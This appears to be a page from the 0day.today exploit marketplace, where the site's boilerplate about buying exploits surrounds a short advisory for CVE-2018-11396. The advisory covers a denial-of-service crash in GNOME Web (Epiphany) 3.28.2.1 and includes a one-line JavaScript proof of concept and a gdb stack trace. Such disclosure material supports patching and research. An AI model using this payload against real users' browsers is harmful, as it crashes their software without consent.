0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Epiphany 3.28.2.1 - Denial of Service Vulnerability
Summary: ephy-session.c in libephymain.so in GNOME Web (aka Epiphany) through 3.28.2.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that triggers access to a NULL URL, as demonstrated by a crafted window.open call, CVE-2018-11396 was assigned to this issue. PoC: <script> win = window.open("hello world"); </script> Stack trace: ftw@ftw-box:~$ gdb epiphany (gdb) run Starting program: /usr/bin/epiphany [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [New Thread 0x7fffe08bc700 (LWP 2279)] [New Thread 0x7fffdee51700 (LWP 2280)] [New Thread 0x7fffde650700 (LWP 2281)] [New Thread 0x7fffdcdd5700 (LWP 2282)] [New Thread 0x7fffd7fff700 (LWP 2283)] [New Thread 0x7fffd77fe700 (LWP 2284)] [New Thread 0x7fffd6ffd700 (LWP 2285)] [New Thread 0x7fffd67fc700 (LWP 2286)] [New Thread 0x7fffd5b8c700 (LWP 2287)] [New Thread 0x7fffd538b700 (LWP 2288)] [New Thread 0x7fff8f486700 (LWP 2294)] [New Thread 0x7fff8da1e700 (LWP 2304)] [New Thread 0x7fff8d21d700 (LWP 2305)] [New Thread 0x7fff8ea7f700 (LWP 2315)] [Thread 0x7fffd5b8c700 (LWP 2287) exited] [Thread 0x7fffd67fc700 (LWP 2286) exited] Thread 15 "pool" received signal SIGSEGV, Segmentation fault. [Switching to Thread 0x7fff8ea7f700 (LWP 2315)] 0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so (gdb) bt #0 0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so #1 0x00007ffff7079be6 in ?? () from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0 #2 0x00007ffff73fe7d0 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0 #3 0x00007ffff73fde05 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0 #4 0x00007fffefc246db in start_thread (arg=0x7fff8ea7f700) at pthread_create.c:463 #5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95 (gdb) # 0day.today [2024-11-15] #